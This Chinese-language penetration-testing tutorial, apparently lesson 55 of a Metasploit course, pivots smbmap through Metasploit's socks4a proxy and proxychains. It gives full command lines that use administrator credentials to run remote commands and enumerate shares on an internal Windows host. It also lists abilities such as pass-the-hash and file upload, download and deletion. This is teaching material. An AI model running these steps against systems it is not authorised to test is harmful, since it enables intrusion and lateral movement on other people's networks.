# 第五十五课：与Smbmap结合攻击

msf 在配合其它框架攻击，可补充 msf 本身的不足以及强化攻击方式，优化攻击线路。本季将会把 msf 与 Smbmap 结合攻击。弥补 msf 文件搜索以及文件内容搜索的不足。

项目地址：<https://github.com/ShawnDEvans/smbmap>

* 支持传递哈希 &#x20;
* 文件上传/下载/删除 &#x20;
* 可枚举（可写共享，配合Metasploit） &#x20;
* 远程命令执行 &#x20;
* 支持文件内容搜索 &#x20;
* 支持文件名匹配（可以自动下载） &#x20;
* msf配合Smbmap攻击需要使用到sock4a模块

```bash
msf auxiliary(server/socks4a) > show options
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJxBR2-cIHSR8DL8Ep%2Ff7b132114e46760984cd298213740f4d.jpg?generation=1551060433542619\&alt=media)

该模块socks4a加入job

```bash
msf auxiliary(server/socks4a) > jobs
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJxBR8miMwfRNLcUDt%2Fc38221c680e3e078414ebb4cfe8ecb66.jpg?generation=1551060439595008\&alt=media)

配置proxychains，做结合攻击铺垫。

```bash
root@John:/tmp# cat /etc/proxychains.conf
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJxBREp5lYY4kpCk1W%2F9fb4144cb5b4c7825b4ad698f740f3f5.jpg?generation=1551060430346568\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJxBRKvWA98soNqlcF%2F33f8922e2c8e134f96f3ca546e96c420.jpg?generation=1551060450926832\&alt=media)

支持远程命令

```bash
root@John:/tmp\# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk group ‐H 192.168.1.115 ‐x 'net user'
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJxBRRGFlCJOzHJjZh%2F0d745135d03f66c1ec9bc97c844730f5.jpg?generation=1551060434968207\&alt=media)

```bash
root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk group ‐H 192.168.1.115 ‐x 'whoami'
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJxBRV1ZRsvy-aL4A3%2Fc7d86f93c68a049ada011d3067384b07.jpg?generation=1551060452905829\&alt=media)

枚举目标机共享

```bash
root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk group ‐H 192.168.1.115 ‐d ABC
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJxBRaC91DgahKuI-L%2Fe28af8ca88f58bb38cf7e10087ab35d6.jpg?generation=1551060440440656\&alt=media)

```bash
root\@John:/tmp\# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk group ‐H 192.168.1.115 ‐x 'ipconfig'
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJxBRgPXae1K14AZqM%2F123a8b0a7824f57dd5a78f5861b8baea.jpg?generation=1551060443586808\&alt=media)

Smbmap支持IP段的共享枚举，当然Smbmap还有更多强大的功能等待探索。

> Micropoor